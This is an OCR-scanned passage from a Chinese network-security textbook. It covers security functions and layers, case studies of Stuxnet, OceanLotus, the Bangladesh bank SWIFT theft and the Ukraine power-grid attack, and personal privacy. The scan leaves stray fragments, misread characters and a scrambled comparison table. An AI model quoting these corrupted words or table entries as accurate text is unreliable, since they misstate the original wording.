要 实现 网 络 安 全 的 上 述 目 标 , 网 络 系统 必须 具备 以 下 几 个 基本 功能 : 
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(1) 网 络 安全 防御 。 对 要 求 有 安全 性 保障 的 网 络 ,必须 具备 各 种 网 络 安全 防御 手段 ,使 
得 网 络 系统 具备 阻止 ,抵御 各 种 已 知 网 络 威胁 和 攻击 的 功能 。 

(2) 网 络 安全 检测 。 即 采用 各 种 手段 和 措施 ,检测 发 现 各 种 已 知 或 未 知 的 网 络 威胁 ， 
并 能 够 采取 相应 的 防范 措施 。 

(3) 网 络 安全 应 急 。 一 旦 网 络 系统 受到 攻击 ,系统 无 法 正常 运行 ,甚至 数据 受到 破坏 ， 
必须 有 相应 的 应 急 手段 和 策略 ,及 时 进行 响应 , 阻 断 网 络 攻击 ,记录 攻击 的 信息 ,以便 事 后 审 
计 和 处 理 。 

(4) 网 络 安全 恢复 , 即 在 网 络 因为 攻击 受到 破坏 后 ,能 够 尽快 恢复 网 络 系统 的 正常 运 
行 ,尽量 减少 网 络 系统 的 中 断 时 间 和 降低 数据 破坏 的 程度 。 

网 络 安全 的 层次 体系 可 以 被 划分 为 物理 层 安全 、 系 统 层 安全 、 网 络 层 安 全 、 应 用 层 安 全 
和 管理 层 安全 5 个 层次 ,各 个 层次 的 安全 性 问题 主要 包括 : 

(1) 网 络 环境 的 安全 性 (物理 层 安全 )。 网 络 环境 的 安全 包括 通信 线路 安全 ,物理 设备 
安全 、 机 房 安 全 等 。 该 层次 的 安全 分 为 主动 安全 和 被 动 安全 ,主动 安全 主要 提高 网 络 系统 本 
身 的 安全 性 和 可 靠 性 ,防止 因 系统 运行 部 件 老化 .设计 缺陷 造成 的 危害 ,被 动 安全 主要 防止 
各 种 自然 灾害 和 人 为 的 破坏 。 

主动 安全 包括 通信 线路 的 可 靠 性 (线路 备份 .网 管 软件 、 传 输 介质 ) , 软 硬 件 设备 安全 性 
(替换 设备 、 拆 印 设备 、 增 加 设备 ) ,设备 的 备份 、 抗 干扰 能 力 ,设备 的 运行 环境 (温度 、 湿 度 、 烟 
侍 ) ,不 间断 电源 保障 ,等 等 。 

被 动 安全 包括 网 络 设 备 和 通信 线路 的 防火 防盗 、 防 自然 灾害 、 防 静电 、 防 雷击 和 电磁 汇 
漏 等 。 

(2) 操作 系统 的 安全 性 (系统 层 安全 ) 。 该 层次 的 安全 问题 来 自 网 络 内 使 用 的 操作 系统 
的 安全 。 操 作 系 统 的 安全 性 主要 表现 在 3 个 方面 : 首先 是 操作 系统 本 身 的 缺陷 带 来 的 不 安 
全 因素 ,主要 包括 身份 认证 .访问 控制 ,系统 漏洞 等 ; 其 次 是 对 操作 系统 的 安全 配置 问题 ; 
tag etn arp 

(3) 网 络 的 安全 性 (网 络 层 安全 )。 该 层次 的 安全 问题 主要 体现 在 网 络 方面 的 安全 性 ， 
te 
名 系统 的 安全 、 路 由 系统 的 安全 、 入 侵 检测 的 手段 .网络 设施 防 病毒 等 。 

(4) 应 用 的 安全 性 (应 用 层 安 全 )。 该 层次 的 安全 问题 主要 由 提供 服务 所 采用 的 应 用 软 
件 和 数据 的 安全 性 产生 ,包括 Web 服务 、 电 子 邮 件 系 统 .DNS 等 。 此 外 ,也 包括 病毒 对 系统 
的 威胁 。 

(5) 管理 的 安全 性 (管理 层 安全 )。 管 理 的 安全 性 包括 网 络 运行 的 基本 安全 管理 与 资源 
和 访问 的 逻辑 安全 管理 。 基 本 安全 管理 包括 安全 技术 和 设备 的 管理 安全 管理 制度 .部门 与 
人 员 的 组 织 规则 等 。 管 理 的 制度 化 极 大 程度 地 影响 着 整个 网 络 的 安全 ,严格 的 安全 管理 制 
度 、 明 确 的 部 门 安全 职责 划分 .合理 的 人 员 角 色 配 置 可 以 在 很 大 程度 上 降低 其 他 层次 的 安全 
风险 。 

资源 和 访问 的 逻辑 安全 管理 包括 如 何 限制 资源 只 被 合法 的 用 户 访问 ,如 何 管理 各 种 口 
令 , 是 否 需 要 限制 登录 次 数 和 登录 时 间 ,登录 的 用 户 具 有 哪些 操作 权限 ,等 等 。 

总 之 ,网 络 系统 的 安全 性 是 一 个 复杂 的 问题 ,在 具体 的 实践 中 ,只 能 具体 问题 具体 分 析 ， 
找 出 有 针对 性 的 方法 ,进行 全 方位 的 综合 防御 。 
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1.2 网 络 安全 的 重要 性 


网 络 安全 的 重要 性 表现 为 网 络 安全 不 仅 与 国家 安全 密切 相关 ,而 且 与 我 们 的 个 人 隐私 
密切 相关 ,存在 于 日 常生 活 的 方方面面 。2010 年 9 月 发 生 的 震 网 病毒 攻击 伊朗 核电 站 事 
件 ,2013 年 斯 诺 登 曝光 的 美国 系列 网 络 监控 丑闻 等 ,都 对 世界 各 国 的 网 络 安 全 领域 带 来 了 
深远 的 影响 。 


1.2.1 网 络 安 全 与 国家 安全 


习近平 总 书记 指出 :“ 没 有 网 络 安全 ,就 没有 国家 安全 .” 在 国际 上 ,已 经 发 生 了 多 起 因 
网 络 安全 没有 同步 跟 进而 导致 的 重大 危害 事件 ,甚至 带 来 了 政府 倒台 。 例 如 2007 年 4.5 月 
间 ,爱沙尼亚 遭受 全 国 性 网 络 攻击 ,攻击 的 对 象 包括 爱沙尼亚 总 统 和 议会 网 站 ,政府 各 部 门 、 
各 政党 、 六 大 新 闻 机 构 中 的 三 家 、 最 大 的 两 家 银行 以 及 通信 公司 等 ,大 量 网 站 被 迫 关闭 ; 
2010 年 伊朗 核 设施 遭受 震 网 病毒 攻击 ,导致 1000 多 台 离 心机 瘫痪 ,引起 世界 震动 ; 2011 年 
社交 网 络 催化 的 西亚 北非 街头 革命 ,导致 多 国政 府 倒台 ; 2015 年 12 月 23 日 ,乌克兰 电力 基 
础 设施 遭受 到 恶意 代码 攻击 ,导致 大 面积 地 区 数 小 时 的 停电 事故 ,造成 严重 社会 恐慌 ,这 是 
一 个 具有 信息 战 水 准 的 网 络 攻 击 事件 。 这 些 惨 痛 的 教训 所 反映 的 共同 问题 ,就 是 网 络 安全 
防护 工作 没有 同步 跟 进 ,使 得 国家 政权 、 基 础 设施 和 社会 生活 面临 极 大 的 网 络 风险 。 

1. 震 网 病毒 

2010 年 首次 发 现 的 震 网 病毒 是 人 类 已 知 的 第 一 个 以 关键 工业 基础 设施 为 目标 的 蠕虫 
病毒 ,该 蠕虫 病毒 感染 并 破坏 了 伊朗 纳 坦 兹 的 核 设施 ,并 最 终 使 伊朗 的 布什 和 尔 核 电站 推迟 启 
动 , 减 组 了 伊朗 成 为 拥 核 国 家 的 进程 ,损害 了 伊朗 国家 安全 。 美 国 和 以 色 列 被 认为 是 此 次 网 
络 攻击 行动 的 幕后 实施 者 。 

Stuxnet( 震 网 ,又 名 震 网 病毒 ) 是 世界 上 首 个 专门 针对 工业 控制 系统 编写 的 破坏 性 病 
毒 ,使 用 Windows 系统 和 西门 子 SIMATIC WinCC 系统 的 7 个 0day 漏洞 进行 攻击 ,目标 针 
对 SIMATIC WinCC 监控 与 数据 采集 (SCADA) 系统 。 该 系统 在 我 国 的 多 个 重要 行业 应 
用 广泛 ,被 用 来 进行 钢铁 电力、 能源、 化 工 等 重要 行业 的 人 机 交互 与 监控 。 

震 网 病毒 攻击 是 人 类 历史 上 第 一 次 网 络 战 实战 ,遭遇 震 网 病毒 攻击 的 核电 站 计算 机 系 
统 实际 上 是 与 外 界 物理 隔离 的 ,理论 上 不 会 遭遇 外 界 攻 击 。 坚 固 的 堡 妈 只 有 从 内 部 才能 被 
攻破 , 震 网 病毒 也 正 是 充分 利用 了 这 一 点 。 震 网 病毒 的 攻击 者 并 没有 广泛 地 去 传播 病毒 ,而 
是 针对 核电 站 相关 工作 人 员 的 家 用 计算 机 、 个 人 计算 机 等 能 够 接触 到 互联 网 的 计算 机 发 起 感 
染 攻 击 ,以 此 为 第 一 道 攻击 跳板 ,进一步 感染 相关 人 员 的 移动 设备 。 当 受 感染 的 移动 设备 接 入 
运行 Windows 操作 系统 的 计算 机 后 , 震 网 病毒 就 能 感染 计算 机 并 隐藏 起 来 。 如 果 计 算 机 连接 
到 网 上 , 震 网 病毒 会 继续 感染 其 他 计算 机 及 任何 接 入 该 计算 机 的 可 移动 装置 ,以 实现 传播 。 

病毒 以 移动 设备 为 桥梁 进入 “堡垒 内 部 ,随即 潜伏 下 来 。 西 门 子 公司 设计 的 SCADA 
系统 与 外 网 是 不 相连 的 ,但 震 网 病毒 会 通过 计算 机 的 USB 端口 检测 WinCC 软件 的 运行 (在 
伊朗 ,该 软件 被 用 于 管理 核 设施 的 离心 机 ) .如 果 软 件 正 在 运行 ,病毒 就 人 侵 该 计算 机 并 且 设 
置 一 个 秘密 的 “后 门 ", 连 上 外 网 ,再 由 位 于 其 他 国家 的 服务 器 下 达 指 令 。 如 果 未 检测 到 
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WinCC 在 运行 , 震 网 病毒 则 会 自我 复制 到 其 他 的 USB 端口 ,并 借 此 传播 病毒 。 此 外 , 震 网 
病毒 也 可 通过 共享 的 文件 夹 及 打印 后 台 处 理 程序 等 途径 传播 到 内 部 网 络 中 。 在 感染 该 控制 
系统 后 , 震 网 病毒 就 隐藏 起 来 ,并 在 几 天 后 开始 对 离心 机 实施 破坏 行动 ,在 进行 破坏 行动 的 
同时 , 它 还 会 发 出 虚假 信号 使 得 安全 系统 误 认为 离心 机 运转 一 切 正常 。 

其 具体 攻击 过 程 如 下 : 

(1) 以 快捷 方式 文件 解析 漏洞 (MS10-046) 感 染 核电 站 相关 工作 人 员 的 个 人 计算 机 。 

(2) 工作 人 员 在 家 中 个 人 计算 机 上 使 用 U 盘 ,病毒 感染 到 U 盘 。 

(3) 工作 人 员 在 单位 使 用 U 盘 , 病 毒 传染 到 局 域 网 。 

(4) 震 网 病毒 通过 共享 的 文件 夹 及 打印 后 台 处 理 程序 等 途径 在 内 部 网 络 中 传播 。 

(5) 病毒 发 作 ,造成 危害 。 

综 上 所 述 , 震 网 病毒 具有 以 下 4 个 特征 : 

(1) 利用 包括 MS10-046、MS10-061、MS08-067 等 7 个 最 新 漏洞 进行 攻击 。7 个 漏洞 
中 ,5 个 针对 Windows 系统 ,2 个 针对 西门 子 SIMATIC WinCC 系统 。 

(2) 伪装 RealTek 与 JMicron 两 大 公司 的 数字 签名 ,从 而 顺利 绕 过 安全 设备 的 检测 。 

(3) 主要 通过 U 盘 和 局 域 网 进行 传播 ,由 于 安装 SIMATIC WinCC 系统 的 计算 机 一 般 
会 与 互联 网 隔绝 ,因此 黑客 特意 强化 了 病毒 的 U 盘 传 播 能 力 。 

(4) 这 是 世界 上 首次 专门 针对 工业 控制 系统 编写 的 破坏 性 病毒 , 它 绝 非 所 谓 的 间谍 病 
毒 ,而 是 纯粹 的 破坏 病毒 。 

2. 海 莲花 事件 

网 络 安全 不 仅 影响 他 国 的 国家 安全 ,也 影响 着 我 国 的 国家 安全 。2016 年 中 国 网 络 安全 
公司 360 首次 披露 一 起 针对 中 国 的 国家 级 黑客 攻击 细节 。 该 境外 黑客 组 织 被 命名 为 海 莲 花 
(Ocean Lotus)。 自 2012 年 4 月 起 , 海 莲花 针对 中 国政 府 的 海事 机 构 ,海域 建设 部 门 、. 科 研 
院 所 和 航运 企业 ,展开 了 精密 组 织 的 网 络 攻击 ,很 明显 是 一 个 有 国外 政府 支持 的 APT( 高 级 
持续 性 威胁 ) 行 动 。 

海 莲 花 使 用 木马 病毒 攻陷 并 控制 政府 人 员 、 外 包 商 \ 行 业 专 家 等 目标 人 群 的 计算 机 , 企 
图 获取 受害 者 计算 机 中 的 机 密 资料 ,截获 受害 计算 机 与 外 界 传递 的 情报 ,甚至 操纵 该 计算 机 
自动 发 送 相 关 情 报 , 从 而 达到 掌握 中 方 动向 的 目的 。 

海 莲花 攻击 的 主要 方式 有 鱼 叉 攻 击 和 水 坑 攻 击 。 鱼 叉 攻 击 是 将 木马 程序 作为 电子 邮件 
的 附件 ,并 起 上 一 个 极 具 诱惑 力 的 名 称 ,发送 给 目标 计算 机 , 诱 使 受害 者 打开 附件 ,从 而 感染 
木马 。 水 坑 攻 击 是 在 受害 者 必 经 之 路 设置 了 一 个 “水 坑 ( 陷 阱 )”。 最 常见 的 做 法 是 ,黑客 分 
析 攻 击 目标 的 上 网 活动 规律 ,寻找 攻击 目标 经 常 访问 的 网 站 的 弱点 , 先 将 此 网 站 “攻破 ”并 植 
入 攻击 代码 ,一 旦 攻击 目标 访问 该 网 站 就 会 “中 招 ”"。 曾 经 发 生 过 这 样 的 案例 ,黑客 攻陷 了 某 
单位 的 内 网 ,将 内 网 上 一 个 要 求全 体 职工 下 载 的 表格 偷偷 换 成 了 木马 程序 ,这 样 ,所 有 按 要 
求 下 载 这 一 表格 的 人 都 会 被 植 人 木马 程序 ,向 黑客 发 送 涉 密 资料 。 

海 莲 花 组 织 在 攻击 中 还 配合 了 多 种 “社会 工程 学 ”的 手段 ,以 求 加 大 攻击 效果 。 比 如 ,在 
进行 鱼 叉 攻 击 时 ,黑客 主要 会 选择 周一 和 周 五 ,因为 这 两 个 时 间 人 们 与 外 界 的 沟通 比较 密 
切 ,是 在 网 络 上 传递 信息 的 高 峰 期 。 而 水 坑 攻 击 的 时 间 则 一 般 选 在 周一 和 周二 ,因为 这 个 时 
候 一 般 是 单位 发 布 通知 、 要 求职 工 登 录 内 网 的 时 候 。 

目前 已 经 捕获 的 与 海 莲花 相关 的 第 一 个 特种 木马 程序 出 现在 2012 年 4 月 ,当时 ,首次 
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发 现 第 一 波 针对 海运 港口 交通 行业 的 “水 坑 ” 攻 击 , 海 莲花 组 织 的 渗透 攻击 就 此 开始 。 不 过 ， 
在 此 后 的 2 年内, 海 莲花 的 攻击 并 不 活跃 。 直 到 2014 年 2 月 , 海 莲花 开始 对 国内 目标 发 送 
定向 的 “ 鱼 又 ”攻击 , 海 莲花 进入 活跃 期 ,并 在 此 后 的 14 个 月 中 对 我 国 多 个 目标 发 动 了 不 间 
断 的 持续 攻击 。2014 年 5 月 , 海 莲 花 对 国内 某 权威 海洋 研究 机 构 发 动 大 规模 鱼 叉 攻 击 , 并 
形成 了 鱼 叉 攻 击 的 最 高 峰 。 

360 公司 表示 ,其 已 捕获 与 海 莲 花 组 织 有 关 的 4 种 不 同形 态 的 特种 木马 程序 样本 
100 余 个 ,感染 者 遍布 中 国 29 个 省 级 行政 区 和 境外 的 36 个 国家 。 其 中 ,中 国 的 感染 者 占 全 
球 92.3%% ,而 在 境内 感染 者 中 ,北京 地 区 最 多 , 占 22. 7%; 天 津 次 之 ,为 15.5%。 为 了 隐蔽 
行踪 , 海 莲花 组 织 还 先后 在 至 少 6 个 国家 注册 了 服务 器 域名 35 个 ,相关 服务 器 IP 地 址 
19 个 ,分 布 在 全 球 13 个 以 上 的 不 同 国家 。 

360 公司 表示 ,首先 这 种 有 组 织 、 有 计划 的 长 期 攻击 行为 需要 很 高 的 投入 ,不 是 一 般 商 
业 公 司 能 够 负担 的 ; 其 次 海 莲 花 逆 饥 的 资料 对 商业 机 构 没 有 什么 价值 。 综 合 来 看 , 海 莲 花 
组 织 的 攻击 周期 之 长 (持续 3 年 以 上 ) 攻击 目标 之 明确 、 攻 击 技术 之 复杂 、 社 工 攻击 手段 之 
精准 ,都 说 明 该 组 织 绝 非 一 般 的 民间 黑客 组 织 , 而 是 具有 国外 政府 支持 的 ,高度 组 织 化 .专业 
化 的 国家 级 黑客 组 织 。 

3. APT 攻击 

“ 震 网 攻击 ”和 “ 海 莲 花 事 件 ” 都 是 典型 的 APT 攻击 。 所 谓 APT(Advanced Persistent 
Threat, 高 级 持续 性 威胁 ) 攻 击 , 是 指 利用 先进 的 攻击 手段 对 特定 目标 进行 长 期 持续 性 网 络 
攻击 的 攻击 形式 。 

APT 攻击 原理 相对 于 其 他 攻击 形式 更 为 高 级 和 先进 ,其 高 级 性 主要 体现 在 发 动 攻 击 之 
前 需要 对 攻击 对 象 的 业务 流程 和 目标 系统 进行 精确 的 收集 。 在 此 收集 过 程 中 ,攻击 会 主动 
挖掘 被 攻击 对 象 信息 系统 和 应 用 程序 的 漏洞 ,利用 这 些 漏 洞 组 建 攻击 者 所 需 的 网 络 ,并 利用 
0day 漏洞 进行 攻击 

0day 漏洞 是 指 没有 发 布 公开 补丁 的 漏洞 .包括 开发 者 有 意 保留 供 自己 使 用 的 漏洞 \ 攻 
击 者 发 现 但 未 通知 开发 者 的 漏洞 .开发 者 正在 开发 补丁 的 漏洞 。 特 征 是 用 户 对 此 类 漏洞 无 
法 防护 ,危害 巨大 。 

“ 震 网 攻击 ”是 一 次 十 分 成 功 的 APT 攻击 ,而 其 最 为 恐怖 的 地 方 就 在 于 极为 巧妙 地 控 
制 了 攻击 范围 ,攻击 十 分 精准 : 60% 的 受害 主机 位 于 伊朗 境内 ,其 中 受害 最 严重 的 为 伊朗 核 
工厂 ,说 明 该 病毒 的 针对 性 极 强 。 

APT 攻击 需要 大 量 人 力 ,物力 ,金钱 \ 时 间 的 投入 ,个 人 往往 承担 不 起 如 此 高 昂 的 费用 ， 
因此 多 数 为 国家 或 大 企业 行为 。 

4. 孟加拉 国 央 行 遭受 网 络 攻击 事件 

和 孟加拉 国 央行 遭受 网 络 攻 击 致 8100 万 美元 资金 被 窃取 事件 是 2016 年 受到 广泛 关注 的 针 
对 金融 基础 设施 的 攻击 事件 ,之 后 针对 银行 SWIFT 系统 的 其 他 网 络 攻击 事件 逐一 被 公开 。 

国内 安全 厂商 中 的 分 析 披 露 工作 表明 攻击 组 织 对 目标 银行 的 业务 流程 非常 熟悉 ,对 目 
标 进行 了 长 时 间 高 度 定 向 的 持续 性 分 析 。 通 过 对 孟加拉 国 央 行 和 越南 先锋 银行 的 恶意 代码 
同 源 性 分 析 ,推测 攻击 组 织 与 Lazarus 组 织 有 关 。 

在 孟加拉 国 央 行 被 黑客 攻击 事件 中 ,攻击 者 通过 网 络 攻击 获得 SWIFT 系统 权限 并 执 
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行业 务 操作 ,通过 恶意 代码 修改 SWIFT 系统 的 校 验 绕 过 安全 验证 \、 算 改 报 文 数据 掩盖 了 非 
法 转账 痕迹 ,以 上 种 种 攻击 手段 的 有 效 利用 充分 暴露 出 银行 系统 自身 安全 的 防护 缺陷 。 

传统 银行 更 多 地 依赖 于 封闭 式 物理 隔离 提供 安全 保障 , 随 着 网 络 金 融 的 不 断 发 展 , 越 来 
越 多 的 交易 支付 入 口 ,大量 的 离散 的 ATM 节点 、 更 多 的 跨行 汇兑 出 现 ,从 而 导致 从 网 络 上 
对 银行 进行 攻击 ,已 经 从 预言 变 成 一 种 广泛 发 生 的 事实 。 

5. 乌克兰 电力 系统 遭受 攻击 事件 

2015 年 12 月 23 日 ,乌克兰 电力 部 门 遭 受到 恶意 代码 攻击 ,乌克兰 新 闻 媒 体 TSN 报道 
称 : 至 少 有 3 个 电力 区 域 被 攻击 ,并 于 当地 时 间 15 时 左右 导致 了 数 小 时 的 停电 事故 ; 攻击 
者 入 侵 了 监控 管理 系统 ,超过 一 半 的 地 区 和 伊 万 诺 - 弗 兰 科 夫 斯 克 地 区 局 部 断 电 几 个 小 时 。 

乌克兰 电力 系统 遭受 攻击 事件 是 一 起 以 电力 基础 设施 为 目标 ,以 Black Energy 等 相关 
恶意 代码 为 主要 攻击 工具 ,通过 BOTNET 体系 进行 前 期 的 资料 采集 和 环境 预 置 ; 以 邮件 发 
送 恶意 代码 载荷 为 最 终 攻击 的 直接 突破 入口 ,通过 远程 控制 SCADA 节点 下 达 指 令 为 断 电 
手段 ,以 摧毁 破坏 SCADA 系统 实现 迟滞 恢复 和 状态 致 育 ; 以 DDoS 服务 电话 作为 干扰 ,最 
后 达成 长 时 间 停 电 并 制造 整个 社会 混乱 的 具有 信息 战 水 准 的 网 络 攻击 事件 。 

乌克兰 电力 系统 遭受 攻击 事件 攻击 的 过 程 是 ,攻击 者 通过 鱼 叉 式 钓鱼 邮件 或 其 他 手段 
首先 向 跳板 机 植 入 Black Energy, 随 后 通过 Black Energy 建立 据点 ,以 跳板 机 作为 据点 进 
行 横向 渗透 ,之 后 通过 攻陷 监控 /装置 区 的 关键 主机 。 同 时 由 于 Black Energy 已 经 形成 了 
具备 规模 的 僵尸 网 络 以 及 定向 传播 等 因素 , 亦 不 排除 攻击 者 已 经 在 乌克兰 电力 系统 中 完成 
了 前 期 环境 预 置 和 持久 化 。 

攻击 者 在 获得 了 SCADA 系统 的 控制 能 力 后 ,通过 相关 方法 下 达 断 电 指令 导致 断 电 ; 
其 后 ,采用 覆盖 MBR 和 部 分 扁 区 的 方式 ,导致 系统 重启 后 不 能 自 举 ; 采用 清除 系统 日 志 的 
方式 提升 事件 后 续 分 析 难 度 ; 采用 覆盖 文档 文件 和 其 他 重要 格式 文件 的 方式 ,导致 实质 性 
的 数据 损失 。 这 一 组 合 拳 不 仅 使 系统 难以 恢复 ,而 且 在 失去 SCADA 的 上 层 故障 回馈 和 显 
示 能 力 后 ,工作 人 员 被 “ 致 育 ”, 从 而 不 能 有 效 推动 恢复 工作 。 

攻击 者 一 方面 在 线 上 变电站 进行 攻击 的 同时 , 另 一 方面 在 线 下 还 对 电力 客服 中 心 进行 
电话 DDoS 攻击 ,两 方面 共同 配合 发 起 攻击 完成 攻击 者 的 目的 。 

乌克兰 电力 系统 遭受 攻击 事件 的 一 个 重要 的 特点 是 ,攻击 者 采用 了 线 上 和 线 下 相 结 合 
的 攻击 方式 , 即 通过 网 络 攻击 导致 基础 设施 的 故障 ,同时 又 通过 对 故障 处 置 电 话 进 行 拒绝 服 
务 的 方式 ,来 干扰 应 急 处 置 能 力 ,提升 恢复 成 本 。 在 未 来 的 网 络 空间 博弈 中 , 线 上 线 下 的 复 
合式 攻击 将 会 越 来 越 多 。 

震 网 事件 和 乌克兰 电力 系统 遭受 攻击 事件 对 比如 表 1-3 所 示 。 


表 1-3 震 网 事件 和 乌克兰 电力 系统 遭受 攻击 事件 对 比 





比较 项 目 “ 震 网 ”事件 乌克兰 电力 系统 遭受 攻击 事件 
伊朗 核 工 业 设施 乌克兰 电力 系统 
Foolad Technic Engineering Co( 该 公司 为 | 乌克兰 最 大 机 场 基辅 鲍 里 斯 波 尔 
主要 攻击 目标 伊朗 工业 设施 生产 自动 化 系统 ) 机 场 
Behpajooh Co. Elec & Comp. Engineering 
(开发 工业 自动 化 系统 ) 


















































第 1 章 网 络 安全 概论 13 
续 表 
比较 项 目 “ 震 网 "事件 乌克兰 电力 系统 遭受 攻击 事件 
Neda Industrial Group( 该 公司 为 工控 领域 | 乌克兰 矿业 公司 
提供 自动 化 服务 ) 乌克兰 铁路 运营 商 
Control-Gostar Jahed Company( 工 业 自 动 | 乌克兰 国有 电力 公司 UKrenergo 
| 乌克兰 TBS 电视台 
Kala Electric( 该 公司 是 铀 浓缩 离心 机 设 
备 主要 供应 商 ) 
作 标 上 位 机 (Windows、WinCC)、PLC 控制 系 | 办 公 机 (Windows)、 上 位 机 (Windows)、 
人 统 、.PLC 以 太 网 -串口 网 关 
造成 后 果 延迟 了 伊朗 的 核 计 划 , 使 之 错过 了 成 为 有 | 乌克兰 伊 万 诺 - 弗 兰 科 夫 斯 克 地 区 大 
核 国家 的 历史 机 遇 面积 停电 
核心 攻击 原理 修改 离心 机 压力 参数 .修改 离心 机 转子 转 | 通过 控制 SCADA 系统 直接 进行 界 
速 参数 面 操作 ,下 达 断 电 指令 
MS08-067(RPC 远程 执行 漏洞 ) 
MS10-046( 快 捷 方 式 文件 解析 漏洞 ) 
MS10-061( 打 印 机 后 台 程 序 服务 漏洞 ) 
i MS10-07( 内 核 模式 驱动 程序 漏洞 ) 本 生机 
MS10-092( 任 务 计划 程序 漏洞 
WINCC 口令 硬 编码 
攻击 入 口 USB 摆渡 、 人 员 植 人 (猜测 ) 邮件 发 送 带 有 恶意 代码 宏 的 文档 
前 置信 息 采 集 
和 环境 预 置 可 能 与 DUQU .FLAME 相关 采集 打击 一 体 
通信 与 控制 高 度 严密 的 加 密 通 信 、 控 制 体系 相对 比较 简单 
恶意 代码 模块 情况 | 庞大 严密 的 模块 体系 ,具有 高 度 的 复 用 性 | 模块 体系 ,具有 复 用 性 
抗 分 析 能 力 高 强度 的 本 地 加 密 , 复 杂 的 调用 机 制 相对 比较 简单 ,易于 分 析 
数字 签名 盗用 3 个 主流 厂商 数字 签名 未 使 用 数字 签名 
攻击 成 本 超 高 开发 成 本 、 超 高 维护 成 本 相对 较 低 








通过 对 比 可 知 , 震 网 事件 这 样 的 APT 攻击 让 人 看 到 更 多 的 是 0day、 复 杂 严 密 的 加 密 策 
略 `PLC 与 固件 等 ; 而 乌克兰 电力 系统 遭受 攻击 事件 是 攻击 者 在 未 使 用 任何 0day, 也 未 使 
用 位 于 生产 系统 侧 的 攻击 组 件 ,仅仅 依 托 PC 端的 恶意 代码 作业 的 情况 下 取得 的 。 其 攻击 


成 本 相对 震 网 方程式 等 攻击 ,显著 降低 ,但 同样 直接 有 效 。 


1.2.2 网 络 安 全 与 个 人 隐私 


网 络 的 普及 使 得 移动 终端 .智能 设备 .可 穿戴 设备 等 越 来 越 多 地 接 人 传统 互联 网 ,智能 
交通 和 汽车 、 金 融 与 支付 安全 、 智 能 家 居 逐 步 成 为 现实 。 随 之 而 来 的 是 网 络 威胁 泛 化 ,网 络 
安全 深入 到 人 们 工作 和 生活 的 方方面面 :严重 影响 着 人 们 的 个 人 隐私 安全 。 


1. 个 人 隐私 


理论 上 ,隐私 是 个 人 、 机 构 等 实体 不 愿意 被 外 界 知晓 的 信息 。 实 际 中 ,隐私 是 指数 据 所 
有 者 不 愿意 被 披露 的 敏感 信息 ,包括 敏感 数据 以 及 数据 所 表征 的 特性 ,如 个 人 的 薪资 、 病 人 
的 患 病 记录 、 公 司 的 财务 信息 等 。 
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隐私 可 分 为 个 人 隐私 和 共同 隐私 两 大 类 。 

(1) 个 人 隐私 (Individual privacy) : 指 任何 可 以 确认 特定 个 人 或 与 可 确认 的 个 人 相关 、 
但 个 人 不 愿 被 暴露 的 信息 ,如 身份 证 号 .银行 账单 等 。 

Banisar 等 人 把 个 人 隐私 分 为 4 类 。 

@ 信息 隐私 : 信息 隐私 包括 身份 证 号 .银行 账号 .收入 和 财产 状况 .婚姻 和 家 庭 成 员 、 
医疗 档案 .消费 和 需求 信息 (如 买房 车、 保险 ,以 及 购物 )、 网 络 活动 踪迹 (如 IP 地 址 ,浏览 踪 
迹 、 活 动 内 容 ) 等 ,也 叫做 数据 隐私 ; 

G@ 通信 和 隐私: 个 人 使 用 各 种 通信 方式 和 其 他 人 的 交流 ,包括 电话 .QQ、E-mail\、 微 信 等; 

@ 空间 隐私 : 个 人 出 入 的 特定 空间 或 区 域 ,包括 家 庭 住 址 、 工 作 单 位 以 及 个 人 出 入 的 
公共 场所 ; 

@ 身体 隐私 : 保护 个 人 身体 的 完整 性 ,防止 侵入 性 操作 ,如 药物 测试 等 。 

本 书 中 个 人 隐私 指 公民 个 人 生活 中 不 愿 为 他 人 公开 或 知悉 的 个 人 信息 ,如 用 户 的 身份 、 
运动 轨迹 、 位 置 等 敏感 信息 。 隐 私 的 范围 包括 私人 信息 .私人 活动 和 私人 空间 。 

(2) 共同 隐私 (Corporate privacy): 共同 隐私 除了 包含 个 人 隐私 外 ,还 包含 所 有 个 人 或 
某 个 机 构 共 同 表现 出 的 .但 又 不 愿 被 暴露 的 信息 ,如 员工 的 平均 工资 ,公司 的 商业 合同 .薪资 
的 分 布 情况 等 。 

互联 网 已 经 成 为 人 们 生活 的 一 部 分 , 留 下 了 人 们 访问 各 大 网 站 的 数据 足迹 。 这 使 个 人 
隐私 泄露 变 得 更 加 容易 ,人 们 时 刻 暴露 在 第 三 只 眼下 ,如 淘宝 .亚马逊 .京东 等 各 大 购物 网 站 
都 在 监视 着 人 们 的 购物 习惯 ; 百度 、 必 应 、 谷 歌 等 监视 人 们 的 查询 记录 ; QQ、 微 博 、 电 话 记 
录 等 窃听 了 人 们 的 社交 关系 网 ; 监视 系统 监控 着 人 们 的 E-mail、 聊 天 记录 、 上 网 记录 等 ; 
cookies 泄露 了 人 们 的 某 些 使 用 习惯 或 者 位 置 等 信息 ,广告 商 便 跟踪 人 们 的 这 些 信息 并 推送 
相关 广告 等 。 

人 们 的 日 常 活动 也 被 监视 着 ,如 智能 手机 监视 着 人 们 的 所 在 位 置 ; 工作 单位 、 各 大 活动 
场所 、 商 店 、 小 区 等 监视 人 们 的 出 入 行为 。 这 就 造成 空间 位 置 隐私 的 侵犯 。 

数字 传感器 技术 的 发 展 使 得 我 们 日 常情 况 下 的 新 型 数据 也 可 以 被 收集 ,如 基于 射频 识 
别 (Radio Frequency IDentification, RFID) 的 自动 付款 系统 和 车 牌 识别 系统 、 可 植 入 的 传 感 
器 监视 病人 的 健康 、 监 视 系统 监视 着 在 家 的 老人 活动 等 。 这 些 数据 传输 过 程 中 ,如 果 节 点 发 
出 的 信息 不 经 过 隐私 保护 ,被 第 三 方 接收 查看 ,那么 病人 的 极为 敏感 的 生理 数据 可 能 被 泄 
露 。 由 此 可 见 , 由 位 置 隐私 和 信息 隐私 侵犯 而 带 来 的 一 系列 问题 必须 引起 重视 。 

随 着 传感器 技术 的 不 断 成 熟 ,各 种 类 型 的 传感器 将 会 被 广泛 地 用 于 个 人 或 组 织 。 这 些 
系统 的 特点 是 交互 变 得 越 来 越 模糊 ,因此 ,需要 新 的 机 制 来 管理 个 人 信息 和 隐私 产生 的 
风险 。 

企业 获得 了 大 量 的 个 人 数据 ,他 们 会 利用 这 些 数据 挖掘 其 蕴含 的 巨大 价值 ,促进 企业 的 
发 展 或 者 获得 更 多 的 经 济 利益 。 个 人 隐私 数据 的 保护 面临 着 内 忧 外 患 。 内 忧 主要 是 指 企业 
